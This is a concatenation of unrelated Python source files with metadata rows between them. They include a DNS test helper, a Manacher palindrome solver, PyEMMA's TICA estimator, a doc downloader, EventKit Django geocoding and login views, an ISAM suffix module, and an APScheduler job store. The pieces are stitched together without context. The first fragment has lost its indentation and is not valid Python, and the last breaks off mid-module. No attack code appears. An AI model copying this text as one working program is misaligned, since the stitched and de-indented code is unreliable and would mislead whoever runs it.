return self.central_service.create_tld(context, values=values)
def create_default_tlds(self):
for index in range(len(self.default_tld_fixtures)):
try:
self.create_default_tld(fixture=index)
except exceptions.DuplicateTLD:
pass
def create_tsigkey(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_tsigkey_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_tsigkey(context, values=values)
def create_domain(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
# We always need a server to create a domain..
try:
self.create_server()
except exceptions.DuplicateServer:
pass
values = self.get_domain_fixture(fixture=fixture, values=kwargs)
if 'tenant_id' not in values:
values['tenant_id'] = context.tenant
return self.central_service.create_domain(context, values=values)
def create_recordset(self, domain, type='A', **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_recordset_fixture(domain['name'], type=type,
fixture=fixture,
values=kwargs)
return self.central_service.create_recordset(context,
domain['id'],
values=values)
def create_record(self, domain, recordset, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_record_fixture(recordset['type'], fixture=fixture,
values=kwargs)
return self.central_service.create_record(context,
domain['id'],
recordset['id'],
values=values)
def create_blacklist(self, **kwargs):
context = kwargs.pop('context', self.admin_context)
fixture = kwargs.pop('fixture', 0)
values = self.get_blacklist_fixture(fixture=fixture, values=kwargs)
return self.central_service.create_blacklist(context, values=values)
def _ensure_interface(self, interface, implementation):
for name in interface.__abstractmethods__:
in_arginfo = inspect.getargspec(getattr(interface, name))
im_arginfo = inspect.getargspec(getattr(implementation, name))
self.assertEqual(
in_arginfo, im_arginfo,
"Method Signature for '%s' mismatched" % name)
def _skip_decorator(func):
@functools.wraps(func)
def skip_if_not_implemented(*args, **kwargs):
try:
return func(*args, **kwargs)
except NotImplementedError as e:
raise testcase.TestSkipped(str(e))
except Exception as e:
if 'not implemented' in str(e):
raise testcase.TestSkipped(str(e))
raise
return skip_if_not_implemented
class SkipNotImplementedMeta(type):
def __new__(cls, name, bases, local):
for attr in local:
value = local[attr]
if callable(value) and (
attr.startswith('test_') or attr == 'setUp'):
local[attr] = _skip_decorator(value)
return type.__new__(cls, name, bases, local)
| apache-2.0 | 8,298,000,509,860,290,000 | 31.235521 | 79 | 0.586178 | false |
boxu0001/practice | py3/dynamicProgramming/S5_ManacherAlgo.py | 1 | 1679 | # Given a string s, find the longest palindromic substring in s. You may assume that the maximum length of s is 1000.
# Example:
# Input: "babad"
# Output: "bab"
# Note: "aba" is also a valid answer.
# Example:
# Input: "cbbd"
# Output: "bb"
#Manacher's Algo
class Solution:
def longestPalindrome(self, s):
s1=[s[i//2] if i&1==1 else '|' for i in range(0, len(s)*2+1)]
# print(s1)
f=[0]*(len(s)*2+1)
calced=[False]*(len(s)*2+1)
calced[0]=True
maxd=0
maxi=0
for (cid, c) in enumerate(s1[1:]):
if calced[cid] == True:
continue
dist=1 if 1 > f[cid] else f[cid]
while((not calced[cid]) and cid-dist>=0 and cid+dist<len(s1) and s1[cid-dist]==s1[cid+dist]):
f[cid]=dist
dist+=1
calced[cid]=True
if f[cid] > maxd:
maxd=f[cid]
maxi=cid
            lid=cid-f[cid] #left boundary index of the palindrome centered at cid
            rid=cid+f[cid] #right boundary index of the palindrome centered at cid
            # pre-fill the mirrored centers 2*cid-i from the radii already known left of cid
            for i in range(lid,cid):
                if i-f[i] > lid or (i-f[i] == lid and rid == len(s1)-1):
                    # palindrome at i fits inside the current window (or touches it while
                    # the window already ends at the last index): the mirror value is exact
                    f[2*cid-i]=f[i]
                    calced[2*cid-i] = True
                elif i-f[i] < lid:
                    # palindrome at i runs past the left boundary: the mirror is clipped
                    # to its distance from the right boundary, i.e. i - lid
                    f[2*cid-i] = i - lid
                else:
                    # palindrome at i exactly touches the boundary: f[i] is only a lower
                    # bound here, so this mirrored center gets expanded again later
                    f[2*cid-i] = f[i]
# print(f)
return s[(maxi-maxd)//2:(maxi+maxd)//2]
s=Solution()
print(s.longestPalindrome('babad'))
print(s.longestPalindrome('a'))
print(s.longestPalindrome('ab'))
print(s.longestPalindrome('abadedab'))
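# --- Editor's sanity check (not part of the original file) ---
# Cross-checks the Manacher implementation above against a small O(n^3) brute
# force on short random strings.  Only the Solution class defined above is
# assumed; if the assertion ever fires, the offending string is shown with it.
def _brute_force_longest_palindrome(text):
    best = ''
    for i in range(len(text)):
        for j in range(i, len(text)):
            cand = text[i:j + 1]
            if cand == cand[::-1] and len(cand) > len(best):
                best = cand
    return best
if __name__ == '__main__':
    import random
    for _ in range(200):
        t = ''.join(random.choice('ab') for _ in range(random.randint(0, 12)))
        got = Solution().longestPalindrome(t)
        ref = _brute_force_longest_palindrome(t)
        # several palindromes may share the maximal length, so compare lengths only
        assert len(got) == len(ref), (t, got, ref)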
| gpl-3.0 | -169,681,256,529,589,700 | 28.982143 | 117 | 0.466945 | false |
marscher/PyEMMA | pyemma/coordinates/transform/tica.py | 1 | 11462 | # This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 19.01.2015
@author: marscher
'''
from __future__ import absolute_import
import numpy as np
from pyemma._base.serialization.serialization import SerializableMixIn
from pyemma._ext.variational.solvers.direct import eig_corr
from pyemma._ext.variational.util import ZeroRankError
from pyemma.coordinates.estimation.covariance import LaggedCovariance
from pyemma.coordinates.transform._tica_base import TICABase, TICAModelBase
from pyemma.util.annotators import fix_docs
import warnings
__all__ = ['TICA']
@fix_docs
class TICA(TICABase, SerializableMixIn):
r""" Time-lagged independent component analysis (TICA)"""
__serialize_version = 0
def __init__(self, lag, dim=-1, var_cutoff=0.95, kinetic_map=True, commute_map=False, epsilon=1e-6,
stride=1, skip=0, reversible=True, weights=None, ncov_max=float('inf')):
r""" Time-lagged independent component analysis (TICA) [1]_, [2]_, [3]_.
Parameters
----------
lag : int
lag time
dim : int, optional, default -1
Maximum number of significant independent components to use to reduce dimension of input data. -1 means
all numerically available dimensions (see epsilon) will be used unless reduced by var_cutoff.
Setting dim to a positive value is exclusive with var_cutoff.
var_cutoff : float in the range [0,1], optional, default 0.95
Determines the number of output dimensions by including dimensions until their cumulative kinetic variance
exceeds the fraction subspace_variance. var_cutoff=1.0 means all numerically available dimensions
(see epsilon) will be used, unless set by dim. Setting var_cutoff smaller than 1.0 is exclusive with dim
kinetic_map : bool, optional, default True
Eigenvectors will be scaled by eigenvalues. As a result, Euclidean distances in the transformed data
approximate kinetic distances [4]_. This is a good choice when the data is further processed by clustering.
commute_map : bool, optional, default False
Eigenvector_i will be scaled by sqrt(timescale_i / 2). As a result, Euclidean distances in the transformed
data will approximate commute distances [5]_.
epsilon : float
eigenvalue norm cutoff. Eigenvalues of C0 with norms <= epsilon will be
cut off. The remaining number of eigenvalues define the size
of the output.
stride: int, optional, default = 1
Use only every stride-th time step. By default, every time step is used.
skip : int, default=0
skip the first initial n frames per trajectory.
reversible: bool, default=True
symmetrize correlation matrices C_0, C_{\tau}.
weights: object or list of ndarrays, optional, default = None
* An object that allows to compute re-weighting factors to estimate equilibrium means and correlations from
off-equilibrium data. The only requirement is that weights possesses a method weights(X), that accepts a
trajectory X (np.ndarray(T, n)) and returns a vector of re-weighting factors (np.ndarray(T,)).
* A list of ndarrays (ndim=1) specifies the weights for each frame of each trajectory.
Notes
-----
Given a sequence of multivariate data :math:`X_t`, computes the mean-free
covariance and time-lagged covariance matrix:
.. math::
C_0 &= (X_t - \mu)^T (X_t - \mu) \\
C_{\tau} &= (X_t - \mu)^T (X_{t + \tau} - \mu)
and solves the eigenvalue problem
.. math:: C_{\tau} r_i = C_0 \lambda_i(tau) r_i,
where :math:`r_i` are the independent components and :math:`\lambda_i(tau)` are
their respective normalized time-autocorrelations. The eigenvalues are
related to the relaxation timescale by
.. math:: t_i(tau) = -\tau / \ln |\lambda_i|.
When used as a dimension reduction method, the input data is projected
onto the dominant independent components.
References
----------
.. [1] Perez-Hernandez G, F Paul, T Giorgino, G De Fabritiis and F Noe. 2013.
Identification of slow molecular order parameters for Markov model construction
J. Chem. Phys. 139, 015102. doi:10.1063/1.4811489
.. [2] Schwantes C, V S Pande. 2013.
Improvements in Markov State Model Construction Reveal Many Non-Native Interactions in the Folding of NTL9
J. Chem. Theory. Comput. 9, 2000-2009. doi:10.1021/ct300878a
.. [3] L. Molgedey and H. G. Schuster. 1994.
Separation of a mixture of independent signals using time delayed correlations
Phys. Rev. Lett. 72, 3634.
.. [4] Noe, F. and Clementi, C. 2015. Kinetic distance and kinetic maps from molecular dynamics simulation.
J. Chem. Theory. Comput. doi:10.1021/acs.jctc.5b00553
.. [5] Noe, F., Banisch, R., Clementi, C. 2016. Commute maps: separating slowly-mixing molecular configurations
for kinetic modeling. J. Chem. Theory. Comput. doi:10.1021/acs.jctc.6b00762
"""
super(TICA, self).__init__()
if kinetic_map and commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if (kinetic_map or commute_map) and not reversible:
kinetic_map = False
commute_map = False
            warnings.warn("Cannot use kinetic_map or commute_map for non-reversible processes, both will be set to"
                          " False.")
# this instance will be set by partial fit.
self._covar = None
self.dim = dim
self.var_cutoff = var_cutoff
self.set_params(lag=lag, dim=dim, var_cutoff=var_cutoff, kinetic_map=kinetic_map, commute_map=commute_map,
epsilon=epsilon, reversible=reversible, stride=stride, skip=skip, weights=weights, ncov_max=ncov_max)
@property
def model(self):
if not hasattr(self, '_model') or self._model is None:
self._model = TICAModelBase()
return self._model
def describe(self):
try:
dim = self.dimension()
except RuntimeError:
dim = self.dim
return "[TICA, lag = %i; max. output dim. = %i]" % (self._lag, dim)
def estimate(self, X, **kwargs):
r"""
Chunk-based parameterization of TICA. Iterates over all data and estimates
the mean, covariance and time lagged covariance. Finally, the
generalized eigenvalue problem is solved to determine
the independent components.
"""
return super(TICA, self).estimate(X, **kwargs)
def partial_fit(self, X):
""" incrementally update the covariances and mean.
Parameters
----------
X: array, list of arrays, PyEMMA reader
input data.
Notes
-----
The projection matrix is first being calculated upon its first access.
"""
from pyemma.coordinates import source
iterable = source(X, chunksize=self.chunksize)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._covar is None:
self._covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
self._covar.partial_fit(iterable)
self.model.update_model_params(mean=self._covar.mean, # TODO: inefficient, fixme
cov=self._covar.C00_,
cov_tau=self._covar.C0t_)
self._estimated = False
return self
def _estimate(self, iterable, **kw):
covar = LaggedCovariance(c00=True, c0t=True, ctt=False, remove_data_mean=True, reversible=self.reversible,
lag=self.lag, bessel=False, stride=self.stride, skip=self.skip,
weights=self.weights, ncov_max=self.ncov_max)
indim = iterable.dimension()
if not self.dim <= indim:
raise RuntimeError("requested more output dimensions (%i) than dimension"
" of input data (%i)" % (self.dim, indim))
if self._logger_is_active(self._loglevel_DEBUG):
self.logger.debug("Running TICA with tau=%i; Estimating two covariance matrices"
" with dimension (%i, %i)", self._lag, indim, indim)
covar.estimate(iterable, chunksize=self.chunksize, **kw)
self.model.update_model_params(mean=covar.mean,
cov=covar.C00_,
cov_tau=covar.C0t_)
self._diagonalize()
return self.model
def _diagonalize(self):
# diagonalize with low rank approximation
self.logger.debug("diagonalize Cov and Cov_tau.")
try:
eigenvalues, eigenvectors = eig_corr(self.cov, self.cov_tau, self.epsilon, sign_maxelement=True)
except ZeroRankError:
raise ZeroRankError('All input features are constant in all time steps. No dimension would be left after dimension reduction.')
if self.kinetic_map and self.commute_map:
raise ValueError('Trying to use both kinetic_map and commute_map. Use either or.')
if self.kinetic_map: # scale by eigenvalues
eigenvectors *= eigenvalues[None, :]
if self.commute_map: # scale by (regularized) timescales
timescales = 1-self.lag / np.log(np.abs(eigenvalues))
# dampen timescales smaller than the lag time, as in section 2.5 of ref. [5]
regularized_timescales = 0.5 * timescales * np.maximum(np.tanh(np.pi * ((timescales - self.lag) / self.lag) + 1), 0)
eigenvectors *= np.sqrt(regularized_timescales / 2)
self.logger.debug("finished diagonalisation.")
# compute cumulative variance
cumvar = np.cumsum(np.abs(eigenvalues) ** 2)
cumvar /= cumvar[-1]
self.model.update_model_params(cumvar=cumvar,
eigenvalues=eigenvalues,
eigenvectors=eigenvectors)
self._estimated = True
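# --- Editor's usage sketch (not part of the original module) ---
# Minimal illustration of how this estimator is typically driven: construct with a
# lag time, estimate from a time series, then inspect the estimated model.  It
# assumes the surrounding pyemma stack is importable and that a plain ndarray is
# accepted by estimate() through pyemma's readers (as partial_fit() above suggests);
# treat it as a sketch, not as API documentation.
if __name__ == '__main__':
    data = np.cumsum(np.random.randn(10000, 5), axis=0)  # toy trajectory, 5 features
    tica_estimator = TICA(lag=10)
    tica_estimator.estimate(data)  # builds C00/C0t and diagonalizes them
    print(tica_estimator.model.eigenvalues[:3])  # slowest TICA eigenvalues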
| lgpl-3.0 | -3,940,986,915,072,458,000 | 46.560166 | 139 | 0.627203 | false |
kevinaloys/airpy | airpy/install.py | 1 | 1219 | import os
import requests
import zipfile
import click
import io
import airpy
import simplejson as json
from airpy import utils
def install_metadata(name):
directory = airpy.data_directory + '/' + name
metadata_response = requests.get('https://pypi.python.org/pypi/'+ name + '/json')
if metadata_response.status_code == 200:
metadata = metadata_response.json()
if not os.path.exists(directory):
os.makedirs(directory)
with open(directory + '/' + name + '_airpy.json', 'w') as outfile:
json.dump(metadata, outfile, sort_keys = True, indent = 4, ensure_ascii = False)
return True
else:
return False
def install_documents(name):
response = requests.get('https://readthedocs.org/projects/' + name + '/downloads/htmlzip/latest/')
if response.status_code == 200:
directory = airpy.data_directory + '/' + name
if not os.path.exists(directory):
os.makedirs(directory)
z = zipfile.ZipFile(io.BytesIO(response.content), 'a')
z.extractall(directory)
return True
else:
return False
def airinstall(name):
if utils.is_doc_installed(name):
click.echo('Docs for ' + name + ' is already installed.')
else:
if install_documents(name):
install_metadata(name) | mit | 7,066,963,502,790,274,000 | 26.727273 | 99 | 0.695652 | false |
venicegeo/eventkit-cloud | eventkit_cloud/ui/views.py | 1 | 15164 | # -*- coding: utf-8 -*-
"""UI view definitions."""
import json
from datetime import timedelta
from logging import getLogger
from django.conf import settings
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout as auth_logout
from django.urls import reverse
from django.http import HttpResponse
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
from django.template.context_processors import csrf
from django.views.decorators.http import require_http_methods
from rest_framework.renderers import JSONRenderer
from eventkit_cloud.api.serializers import UserDataSerializer
from eventkit_cloud.ui.helpers import (
file_to_geojson,
set_session_user_last_active_at,
is_mgrs,
is_lat_lon,
)
from eventkit_cloud.utils.geocoding.coordinate_converter import CoordinateConverter
from eventkit_cloud.utils.geocoding.geocode import Geocode
from eventkit_cloud.utils.geocoding.reverse import ReverseGeocode
logger = getLogger(__file__)
@require_http_methods(["GET"])
def create_export(request):
"""
Handles display of the create export page.
"""
user = request.user
max_extent = {"extent": settings.JOB_MAX_EXTENT}
for group in user.groups.all():
if hasattr(group, "export_profile"):
max_extent["extent"] = group.export_profile.max_extent
extent = max_extent.get("extent")
context = {"user": user, "max_extent": extent}
context.update(csrf(request))
return render_to_response("ui/create.html", context, RequestContext(request))
# @user_verification_required
@require_http_methods(["GET"])
def clone_export(request, uuid=None):
"""
Handles display of the clone export page.
"""
max_extent = {"extent": settings.JOB_MAX_EXTENT} # default
user = request.user
for group in user.groups.all():
if hasattr(group, "export_profile"):
max_extent["extent"] = group.export_profile.max_extent
extent = max_extent.get("extent")
context = {"user": user, "max_extent": extent}
context.update(csrf(request))
return render_to_response("ui/clone.html", context, RequestContext(request))
# @user_verification_required
@require_http_methods(["GET"])
def view_export(request, uuid=None): # NOQA
"""
    Handles display of the export detail page.
"""
user = request.user
context = {"user": user}
return render_to_response("ui/detail.html", context, RequestContext(request))
def auth(request):
if (request.method == "GET") and request.user.is_authenticated:
# If the user is already authenticated we want to return the user data (required for oauth).
return HttpResponse(
JSONRenderer().render(UserDataSerializer(request.user, context={"request": request}).data),
content_type="application/json",
status=200,
)
elif getattr(settings, "LDAP_SERVER_URI", getattr(settings, "DJANGO_MODEL_LOGIN")):
if request.method == "POST":
"""Logs out user"""
auth_logout(request)
username = request.POST.get("username")
password = request.POST.get("password")
user_data = authenticate(username=username, password=password)
if user_data is None:
return HttpResponse(status=401)
else:
login(request, user_data)
set_session_user_last_active_at(request)
return HttpResponse(
JSONRenderer().render(UserDataSerializer(user_data, context={"request": request}).data),
content_type="application/json",
status=200,
)
if request.method == "GET":
# We want to return a 200 so that the frontend can decide if the auth endpoint is valid for displaying the
            # login form.
return HttpResponse(status=200)
else:
return HttpResponse(status=400)
def logout(request):
"""Logs out user"""
auth_logout(request)
response = redirect("login")
if settings.SESSION_USER_LAST_ACTIVE_AT in request.session:
del request.session[settings.SESSION_USER_LAST_ACTIVE_AT]
response.delete_cookie(settings.AUTO_LOGOUT_COOKIE_NAME, domain=settings.SESSION_COOKIE_DOMAIN)
return response
def require_email(request):
"""
View to handle email collection for new user log in with OSM account.
"""
backend = request.session["partial_pipeline"]["backend"]
return render_to_response("osm/email.html", {"backend": backend}, RequestContext(request))
@require_http_methods(["GET"])
def search(request):
"""
Detects the query type and calls the relevant geocoder to get results
:param request: User request which should include a query parameter
:return: A geojson with features matching the search query
"""
q = request.GET.get("query", None)
if not q:
return HttpResponse(status=204, content_type="application/json")
error_string = "An unknown error occurred while querying for results, please contact an administrator."
degree_range = 0.05
if is_mgrs(q):
# check for necessary settings
if getattr(settings, "CONVERT_API_URL") is None:
return HttpResponse("No Convert API specified", status=501)
if getattr(settings, "REVERSE_GEOCODING_API_URL") is None:
return HttpResponse("No Reverse Geocode API specified", status=501)
# make call to convert which should return a geojson feature of the MGRS location
convert = CoordinateConverter()
try:
mgrs_data = convert.get(q)
except Exception:
return HttpResponse(content=error_string, status=500)
# if no feature geom return nothing
if not mgrs_data or not mgrs_data.get("geometry"):
return HttpResponse(status=204, content_type="application/json")
features = []
# save the mgrs feature to return later
if not mgrs_data.get("properties"):
mgrs_data["properties"] = {}
mgrs_data["properties"]["bbox"] = [
mgrs_data.get("geometry").get("coordinates")[0] - degree_range,
mgrs_data.get("geometry").get("coordinates")[1] - degree_range,
mgrs_data.get("geometry").get("coordinates")[0] + degree_range,
mgrs_data.get("geometry").get("coordinates")[1] + degree_range,
]
mgrs_data["source"] = "MGRS"
features.append(mgrs_data)
# call reverse to get a list of results near the mgrs feature
reverse = ReverseGeocode()
try:
result = reverse.search(
{
"lat": mgrs_data.get("geometry").get("coordinates")[1],
"lon": mgrs_data.get("geometry").get("coordinates")[0],
}
)
except Exception:
return HttpResponse(content=error_string, status=500)
if result.get("features"):
# add the mgrs feature with the search results and return together
result["features"] = features + result["features"]
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
# if no results just return the MGRS feature in the response
return HttpResponse(content=json.dumps({"features": features}), status=200, content_type="application/json",)
elif is_lat_lon(q):
coords = is_lat_lon(q)
# if no reverse url return 501
if getattr(settings, "REVERSE_GEOCODING_API_URL") is None:
return HttpResponse("No Reverse Geocode API specified", status=501)
# make call to reverse geocode
reverse = ReverseGeocode()
try:
result = reverse.search({"lat": coords[0], "lon": coords[1]})
except Exception as e:
return HttpResponse(content=error_string, status=500)
# create a feature representing the exact lat/lon being searched
point_feature = {
"geometry": {"type": "Point", "coordinates": [coords[1], coords[0]]},
"source": "Coordinate",
"type": "Feature",
"properties": {
"name": "{0} {1}, {2} {3}".format(
coords[0] if coords[0] >= 0 else coords[0] * -1,
"N" if coords[0] >= 0 else "S",
coords[1] if coords[1] >= 0 else coords[1] * -1,
"E" if coords[1] >= 0 else "W",
),
"bbox": [
coords[1] - degree_range,
coords[0] - degree_range,
coords[1] + degree_range,
coords[0] + degree_range,
],
},
}
# if there are results add the point feature and return them together
if result.get("features"):
result.get("features").insert(0, point_feature)
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
# if there are no results return only the point feature
features = {"features": [point_feature]}
return HttpResponse(content=json.dumps(features), status=200, content_type="application/json")
else:
# make call to geocode with search
geocode = Geocode()
try:
result = geocode.search(q)
except Exception as e:
logger.error(e)
return HttpResponse(content=error_string, status=500)
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
@require_http_methods(["GET"])
def geocode(request):
geocode = Geocode()
if request.GET.get("search"):
result = geocode.search(request.GET.get("search"))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
if request.GET.get("result"):
result = geocode.add_bbox(json.loads(request.GET.get("result")))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
else:
return HttpResponse(status=204, content_type="application/json")
@require_http_methods(["GET"])
def convert(request):
convert = CoordinateConverter()
if getattr(settings, "CONVERT_API_URL") is not None:
if request.GET.get("convert"):
result = convert.get(request.GET.get("convert"))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
else:
return HttpResponse(status=204, content_type="application/json")
else:
return HttpResponse("No Convert API specified", status=501)
@require_http_methods(["GET"])
def reverse_geocode(request):
reverseGeocode = ReverseGeocode()
if getattr(settings, "REVERSE_GEOCODING_API_URL") is not None:
if request.GET.get("lat") and request.GET.get("lon"):
result = reverseGeocode.search({"lat": request.GET.get("lat"), "lon": request.GET.get("lon")})
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
if request.GET.get("result"):
result = reverseGeocode.add_bbox(json.loads(request.GET.get("result")))
return HttpResponse(content=json.dumps(result), status=200, content_type="application/json")
else:
return HttpResponse(status=204, content_type="application/json")
else:
return HttpResponse("No Reverse Geocode API specified", status=501)
@require_http_methods(["GET"])
def about(request):
exports_url = reverse("list")
help_url = reverse("help")
return render_to_response(
"ui/about.html", {"exports_url": exports_url, "help_url": help_url}, RequestContext(request),
)
@require_http_methods(["GET"])
def help_main(request):
return render_to_response("help/help.html", {}, RequestContext(request))
@require_http_methods(["GET"])
def help_create(request):
create_url = reverse("create")
help_features_url = reverse("help_features")
return render_to_response(
"help/help_create.html",
{"create_url": create_url, "help_features_url": help_features_url},
RequestContext(request),
)
@require_http_methods(["GET"])
def help_features(request):
return render_to_response("help/help_features.html", {}, RequestContext(request))
@require_http_methods(["GET"])
def help_exports(request):
export_url = reverse("list")
return render_to_response("help/help_exports.html", {"export_url": export_url}, RequestContext(request))
@require_http_methods(["GET"])
def help_formats(request):
return render_to_response("help/help_formats.html", {}, RequestContext(request))
@require_http_methods(["GET"])
def help_presets(request):
configurations_url = reverse("configurations")
return render_to_response(
"help/help_presets.html", {"configurations_url": configurations_url}, RequestContext(request),
)
@require_http_methods(["GET"])
def get_config(request):
"""
:param request: a GET request
:return: a dict of available configurations
"""
config = getattr(settings, "UI_CONFIG", {})
return HttpResponse(json.dumps(config), content_type="application/json", status=200)
@require_http_methods(["POST"])
def convert_to_geojson(request):
file = request.FILES.get("file", None)
if not file:
return HttpResponse("No file supplied in the POST request", status=400)
try:
geojson = file_to_geojson(file)
return HttpResponse(json.dumps(geojson), content_type="application/json", status=200)
except Exception as e:
logger.error(e)
return HttpResponse(str(e), status=400)
def user_active(request):
"""Prevents auto logout by updating the session's last active time"""
# If auto logout is disabled, just return an empty body.
if not settings.AUTO_LOGOUT_SECONDS:
return HttpResponse(json.dumps({}), content_type="application/json", status=200)
last_active_at = set_session_user_last_active_at(request)
auto_logout_at = last_active_at + timedelta(seconds=settings.AUTO_LOGOUT_SECONDS)
auto_logout_warning_at = auto_logout_at - timedelta(seconds=settings.AUTO_LOGOUT_WARNING_AT_SECONDS_LEFT)
return HttpResponse(
json.dumps(
{
"auto_logout_at": auto_logout_at.isoformat(),
"auto_logout_warning_at": auto_logout_warning_at.isoformat(),
}
),
content_type="application/json",
status=200,
)
# error views
@require_http_methods(["GET"])
def create_error_view(request):
return render_to_response("ui/error.html", {}, RequestContext(request), status=500)
def internal_error_view(request):
return render_to_response("ui/500.html", {}, RequestContext(request), status=500)
def not_found_error_view(request):
return render_to_response("ui/404.html", {}, RequestContext(request), status=404)
def not_allowed_error_view(request):
return render_to_response("ui/403.html", {}, RequestContext(request), status=403)
| bsd-3-clause | 282,585,686,439,759,100 | 37.683673 | 118 | 0.643827 | false |
IBM-Security/ibmsecurity | ibmsecurity/isam/web/runtime/federated_directories/suffix.py | 1 | 2895 | import logging
import ibmsecurity.utilities.tools
logger = logging.getLogger(__name__)
def get(isamAppliance, directory_name, check_mode=False, force=False):
"""
Retrieving the list of suffixes for a particular federated directory
"""
return isamAppliance.invoke_get("Retrieving the list of suffixes for a particular federated directory",
"/isam/runtime_components/federated_directories/{0}/suffix/v1".format(
directory_name))
def add(isamAppliance, directory_name, suffix, use_ssl=False, client_cert_label=None,
check_mode=False,
force=False):
"""
Create a new suffix in a particular federated directory
"""
if force is True or _check(isamAppliance, directory_name, suffix) is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post(
"Create a new suffix in a particular federated directory",
"/isam/runtime_components/federated_directories/{0}/suffix/v1".format(directory_name),
{
'suffix': suffix
})
return isamAppliance.create_return_object()
def delete(isamAppliance, directory_name, suffix_name, check_mode=False, force=False):
"""
Remove an existing suffix from a federated directory
"""
if force is True or _check(isamAppliance, directory_name, suffix_name) is True:
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_delete(
"Remove an existing suffix from a federated directory",
"/isam/runtime_components/federated_directories/{0}/suffix/{1}/v1".format(directory_name, suffix_name))
return isamAppliance.create_return_object()
def _check(isamAppliance, directory_name, suffix):
"""
Check if federated directory suffix exists - will return true if any match is found
:param isamAppliance:
:param directory_name:
:param suffix:
:return:
"""
ret_obj = get(isamAppliance, directory_name)
for suffix_obj in ret_obj['data']:
if isinstance(suffix, list): # Add passes a list
for new_suffix in suffix:
if new_suffix['id'] == suffix_obj['id']:
return True
else: # Update passes just suffix_name
if suffix_obj['id'] == suffix:
return True
return False
def compare(isamAppliance1, isamAppliance2, directory_name):
"""
    Compare federated directory suffixes between two appliances
"""
ret_obj1 = get(isamAppliance1, directory_name)
ret_obj2 = get(isamAppliance2, directory_name)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
| apache-2.0 | 8,466,255,597,332,144,000 | 34.740741 | 119 | 0.639033 | false |
casanovainformationservices/LazyLibrarian | lib/apscheduler/jobstores/sqlalchemy_store.py | 1 | 3135 | """
Stores jobs in a database table using SQLAlchemy.
"""
import pickle
import logging
from lib.apscheduler.jobstores.base import JobStore
from lib.apscheduler.job import Job
try:
from sqlalchemy import *
except ImportError: # pragma: nocover
raise ImportError('SQLAlchemyJobStore requires SQLAlchemy installed')
logger = logging.getLogger(__name__)
class SQLAlchemyJobStore(JobStore):
def __init__(self, url=None, engine=None, tablename='apscheduler_jobs',
metadata=None, pickle_protocol=pickle.HIGHEST_PROTOCOL):
self.jobs = []
self.pickle_protocol = pickle_protocol
if engine:
self.engine = engine
elif url:
self.engine = create_engine(url)
else:
raise ValueError('Need either "engine" or "url" defined')
self.jobs_t = Table(tablename, metadata or MetaData(),
Column('id', Integer,
Sequence(tablename + '_id_seq', optional=True),
primary_key=True),
Column('trigger', PickleType(pickle_protocol, mutable=False),
nullable=False),
Column('func_ref', String(1024), nullable=False),
Column('args', PickleType(pickle_protocol, mutable=False),
nullable=False),
Column('kwargs', PickleType(pickle_protocol, mutable=False),
nullable=False),
Column('name', Unicode(1024), unique=True),
Column('misfire_grace_time', Integer, nullable=False),
Column('coalesce', Boolean, nullable=False),
Column('max_runs', Integer),
Column('max_instances', Integer),
Column('next_run_time', DateTime, nullable=False),
Column('runs', BigInteger))
self.jobs_t.create(self.engine, True)
def add_job(self, job):
job_dict = job.__getstate__()
result = self.engine.execute(self.jobs_t.insert().values(**job_dict))
job.id = result.inserted_primary_key[0]
self.jobs.append(job)
def remove_job(self, job):
delete = self.jobs_t.delete().where(self.jobs_t.c.id == job.id)
self.engine.execute(delete)
self.jobs.remove(job)
def load_jobs(self):
jobs = []
for row in self.engine.execute(select([self.jobs_t])):
try:
job = Job.__new__(Job)
job_dict = dict(list(row.items()))
job.__setstate__(job_dict)
jobs.append(job)
except Exception:
job_name = job_dict.get('name', '(unknown)')
logger.exception('Unable to restore job "%s"', job_name)
self.jobs = jobs
def update_job(self, job):
job_dict = job.__getstate__()
update = self.jobs_t.update().where(self.jobs_t.c.id == job.id).\
values(next_run_time=job_dict['next_run_time'],
runs=job_dict['runs'])
self.engine.execute(update)
def close(self):
self.engine.dispose()
def __repr__(self):
return '<%s (url=%s)>' % (self.__class__.__name__, self.engine.url)
| gpl-3.0 | -7,027,673,187,408,794,000 | 35.034483 | 77 | 0.57512 | false |
Kha/odie-server | routes/accounting.py | 1 | 1757 | #! /usr/bin/env python3
import db.accounting
from .common import IdSchema, CashBoxField
from marshmallow import Schema, fields
from odie import sqla
from login import get_user, login_required
from api_utils import deserialize, api_route, ClientError
from db.documents import Deposit, Document
class ErroneousSaleLoadSchema(Schema):
amount = fields.Int(required=True)
cash_box = CashBoxField()
